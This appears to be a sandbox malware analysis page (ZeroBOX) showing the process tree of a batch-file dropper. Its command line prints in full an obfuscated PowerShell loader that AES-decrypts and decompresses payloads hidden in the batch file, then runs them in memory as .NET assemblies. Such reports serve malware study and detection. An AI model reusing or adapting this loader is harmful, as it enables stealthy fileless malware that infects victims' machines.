popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ZMpj" C:\Users\test22\AppData\Local\Temp\a.bat

    3016

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat

      2172

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat

        2276

        • a.bat.scr "C:\Users\test22\AppData\Local\Temp\a.bat.scr" -w hidden -c $ZDDX='FroDkPsmDkPsBaDkPssDkPse6DkPs4SDkPstrDkPsiDkPsngDkPs'.Replace('DkPs', '');$REDa='ElDkPsemeDkPsntDkPsAtDkPs'.Replace('DkPs', '');$SBHr='EnDkPstrDkPsyDkPsPDkPsoDkPsinDkPstDkPs'.Replace('DkPs', '');$fSbL='CreaDkPstDkPseDDkPsecDkPsrypDkPstoDkPsrDkPs'.Replace('DkPs', '');$kPEg='GeDkPstDkPsCurDkPsrenDkPstPDkPsrDkPsoceDkPsssDkPs'.Replace('DkPs', '');$vbhH='MainDkPsMoDkPsdulDkPseDkPs'.Replace('DkPs', '');$pBLk='CDkPshaDkPsnDkPsgeDkPsExtDkPseDkPsnsDkPsionDkPs'.Replace('DkPs', '');$wPOx='RDkPseDkPsadDkPsLiDkPsnesDkPs'.Replace('DkPs', '');$ZwmH='TrDkPsaDkPsnsDkPsfoDkPsrDkPsmDkPsFDkPsinaDkPslDkPsBloDkPsckDkPs'.Replace('DkPs', '');$Aemh='InDkPsvokeDkPs'.Replace('DkPs', '');$HJAU='SplDkPsitDkPs'.Replace('DkPs', '');$bCXl='LoDkPsadDkPs'.Replace('DkPs', '');function wvhkg($WpAwA){$VPBAm=[System.Security.Cryptography.Aes]::Create();$VPBAm.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VPBAm.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VPBAm.Key=[System.Convert]::$ZDDX('LmI+9BB6dU4mTC5f7d/2Xp8FBQ+CA7p+uit12QgeCXs=');$VPBAm.IV=[System.Convert]::$ZDDX('/JyMcryq8q/bpJjxAcNhzw==');$cBKYi=$VPBAm.$fSbL();$YwqDT=$cBKYi.$ZwmH($WpAwA,0,$WpAwA.Length);$cBKYi.Dispose();$VPBAm.Dispose();$YwqDT;}function BDLDg($WpAwA){$fmiJk=New-Object System.IO.MemoryStream(,$WpAwA);$hMwwv=New-Object System.IO.MemoryStream;$jDapD=New-Object System.IO.Compression.GZipStream($fmiJk,[IO.Compression.CompressionMode]::Decompress);$jDapD.CopyTo($hMwwv);$jDapD.Dispose();$fmiJk.Dispose();$hMwwv.Dispose();$hMwwv.ToArray();}$VjKYO=[System.Linq.Enumerable]::$REDa([System.IO.File]::$wPOx([System.IO.Path]::$pBLk([System.Diagnostics.Process]::$kPEg().$vbhH.FileName, $null)), 1);$kNLAh=$VjKYO.Substring(2).$HJAU(':');$XiRit=BDLDg (wvhkg ([Convert]::$ZDDX($kNLAh[0])));$grRWa=BDLDg (wvhkg ([Convert]::$ZDDX($kNLAh[1])));[System.Reflection.Assembly]::$bCXl([byte[]]$grRWa).$SBHr.$Aemh($null,$null);[System.Reflection.Assembly]::$bCXl([byte[]]$XiRit).$SBHr.$Aemh($null,$null);

          2404

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf